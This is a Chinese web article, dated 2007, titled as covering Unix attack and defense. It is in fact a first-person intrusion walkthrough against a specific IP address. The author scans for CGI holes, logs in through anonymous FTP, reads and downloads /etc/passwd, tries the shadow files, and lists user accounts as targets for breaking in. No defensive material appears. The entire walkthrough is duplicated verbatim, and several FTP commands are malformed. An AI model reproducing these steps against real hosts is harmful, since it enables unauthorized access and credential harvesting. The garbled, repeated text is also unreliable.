站内搜索
分类列表
本类阅读排行
本类推荐文章
广告
Unix系统攻击和防范
作者: 来源: 点击: 日期:2007-11-16 8:36:53
用messala扫描一下看有没有CGI漏洞:(略去复杂的扫描过程)……结果是滴水不漏!这个鸟管理员还挺勤快的…… 只好用nss看看它开了什么服务吧!……还好,telnet、ftp和finger的端口都打开了!先看看有没有匿名ftp账户:
bash$ ftp 202.202.0.8
Connected to 202.202.0.8...
220 Cool FTP server(Version xxx Tue Dec 8 12:42:10 CDT 2001) ready.
Name(202.202.0.8:FakeName):anonymous
331 Guest login ok,send you complete e-mail address as password.
Password:
230:Welcome,archive user!
…………
…………
…………
ftp>
还行,匿名ftp服务没有关,竟然可以用anonymous账户进来了!赶紧抓他的passwd:
ftp>ls
…………
bin boot etc dev home lib usr proc lost found root sbin src tmp usr var
…………
ftp>cd /etc
…………
ftp>ls *passwd*
…………
passwd passwd-
…………
不会如此简单吧?看一看?
ftp>cat passwd more
…………
root:x:0:1:Super-User:/:/sbin/sh
daemon:x:1:1::/:
bin:x:2:2::/usr/bin:
sys:x:3:3::/:
adm:x:4:4:Admin:/var/adm:
telnet:x:71:8:Line Printer Admin:/usr/spool/lp:
uucp:x:5:5:uucp Admin:/usr/lib/uucp:
nuucp:x:9:9:uucp Admin:/var/spool/uucppublic:/usr/lib/uucp/uucico
listen:x:37:4:Network Admin:/usr/net/nls:
ftp:60001:60001:Ftp:/:
noaccess:x:60002:60002:No Access User:/:
nobody:x:65534:65534:SunOS 4.x Nobody:/:
dennis:x:1005:20::/export/home/dennis:/bin/sh
walter:x:1001:100::/export/home/walter:/bin/sh
power:x:9589:101::/export/home/power:/bin/sh
deal:x:1035:20::/export/home/deal:/bin/sh
jessica:x:3000:300:Agent Client 1:/export/home/jessica:/bin/sh
smith:x:3001:300:Agent Client 2:/export/home/smith:/bin/sh
render:x:9591:101::/export/home/render:/bin/sh
…………
倒霉,是个空的passwd!看看备份:
ftp>cat passwd- more
…………
root:x:0:1:Super-User:/:/sbin/sh
daemon:x:1:1::/:
bin:x:2:2::/usr/bin:
sys:x:3:3::/:
adm:x:4:4:Admin:/var/adm:
telnet:x:71:8:Line Printer Admin:/usr/spool/lp:
uucp:x:5:5:uucp Admin:/usr/lib/uucp:
nuucp:x:9:9:uucp Admin:/var/spool/uucppublic:/usr/lib/uucp/uucico
listen:x:37:4:Network Admin:/usr/net/nls:
ftp:60001:60001:Ftp:/:
noaccess:x:60002:60002:No Access User:/:
nobody :x:65534:65534:SunOS 4.x Nobody:/:
dennis:x:1005:20::/export/home/dennis:/bin/sh
walter:x:1001:100::/export/home/walter:/bin/sh
power:x:9589:101::/export/home/power:/bin/sh
deal:x:1035:20::/export/home/deal:/bin/sh
jessica:x:3000:300:Agent Client 1:/export/home/jessica:/bin/sh
smith:x:3001:300:Agent Client 2:/export/home/smith:/bin/sh
render:x:9591:101::/export/home/render:/bin/sh
…………
没救了,一样的!查查看有没有shadow文件:
ftp>ls *shadow*
…………
shadow shadow-
…………
哈哈,一般passwd是空的,那么密码就在shadow中!
ftp>cat shadow more
…………
[sh$ cat shadow more]: Permission denied
…………
可恶,看都不让看,试试备份文件:
ftp>cat shadow- more
…………
[sh$ cat shadow- more]: Permission denied
…………
都一样――不让看!Faint! 只好可怜惜惜地把空passwd抓回来――有几个用户名总比没有强吧?
ftp>get passwd
226 Transfer complete.
540 bytes received in 0.55 seconds (1.8Kbytes/s)
ftp>bye
221 Goodbye.
bash$
研究一下,除去root和被关掉的账号,还有七个可用账号:dennis、walter、power、deal、jessica、smith和render,他们就是我们进入该主机最后的希望。
bash$ ftp 202.202.0.8
Connected to 202.202.0.8...
220 Cool FTP server(Version xxx Tue Dec 8 12:42:10 CDT 2001) ready.
Name(202.202.0.8:FakeName):anonymous
331 Guest login ok,send you complete e-mail address as password.
Password:
230:Welcome,archive user!
…………
…………
…………
ftp>
还行,匿名ftp服务没有关,竟然可以用anonymous账户进来了!赶紧抓他的passwd:
ftp>ls
…………
bin boot etc dev home lib usr proc lost found root sbin src tmp usr var
…………
ftp>cd /etc
…………
ftp>ls *passwd*
…………
passwd passwd-
…………
不会如此简单吧?看一看?
ftp>cat passwd more
…………
root:x:0:1:Super-User:/:/sbin/sh
daemon:x:1:1::/:
bin:x:2:2::/usr/bin:
sys:x:3:3::/:
adm:x:4:4:Admin:/var/adm:
telnet:x:71:8:Line Printer Admin:/usr/spool/lp:
uucp:x:5:5:uucp Admin:/usr/lib/uucp:
nuucp:x:9:9:uucp Admin:/var/spool/uucppublic:/usr/lib/uucp/uucico
listen:x:37:4:Network Admin:/usr/net/nls:
ftp:60001:60001:Ftp:/:
noaccess:x:60002:60002:No Access User:/:
nobody:x:65534:65534:SunOS 4.x Nobody:/:
dennis:x:1005:20::/export/home/dennis:/bin/sh
walter:x:1001:100::/export/home/walter:/bin/sh
power:x:9589:101::/export/home/power:/bin/sh
deal:x:1035:20::/export/home/deal:/bin/sh
jessica:x:3000:300:Agent Client 1:/export/home/jessica:/bin/sh
smith:x:3001:300:Agent Client 2:/export/home/smith:/bin/sh
render:x:9591:101::/export/home/render:/bin/sh
…………
倒霉,是个空的passwd!看看备份:
ftp>cat passwd- more
…………
root:x:0:1:Super-User:/:/sbin/sh
daemon:x:1:1::/:
bin:x:2:2::/usr/bin:
sys:x:3:3::/:
adm:x:4:4:Admin:/var/adm:
telnet:x:71:8:Line Printer Admin:/usr/spool/lp:
uucp:x:5:5:uucp Admin:/usr/lib/uucp:
nuucp:x:9:9:uucp Admin:/var/spool/uucppublic:/usr/lib/uucp/uucico
listen:x:37:4:Network Admin:/usr/net/nls:
ftp:60001:60001:Ftp:/:
noaccess:x:60002:60002:No Access User:/:
nobody :x:65534:65534:SunOS 4.x Nobody:/:
dennis:x:1005:20::/export/home/dennis:/bin/sh
walter:x:1001:100::/export/home/walter:/bin/sh
power:x:9589:101::/export/home/power:/bin/sh
deal:x:1035:20::/export/home/deal:/bin/sh
jessica:x:3000:300:Agent Client 1:/export/home/jessica:/bin/sh
smith:x:3001:300:Agent Client 2:/export/home/smith:/bin/sh
render:x:9591:101::/export/home/render:/bin/sh
…………
没救了,一样的!查查看有没有shadow文件:
ftp>ls *shadow*
…………
shadow shadow-
…………
哈哈,一般passwd是空的,那么密码就在shadow中!
ftp>cat shadow more
…………
[sh$ cat shadow more]: Permission denied
…………
可恶,看都不让看,试试备份文件:
ftp>cat shadow- more
…………
[sh$ cat shadow- more]: Permission denied
…………
都一样――不让看!Faint! 只好可怜惜惜地把空passwd抓回来――有几个用户名总比没有强吧?
ftp>get passwd
226 Transfer complete.
540 bytes received in 0.55 seconds (1.8Kbytes/s)
ftp>bye
221 Goodbye.
bash$
研究一下,除去root和被关掉的账号,还有七个可用账号:dennis、walter、power、deal、jessica、smith和render,他们就是我们进入该主机最后的希望。
Unix系统攻击和防范 评论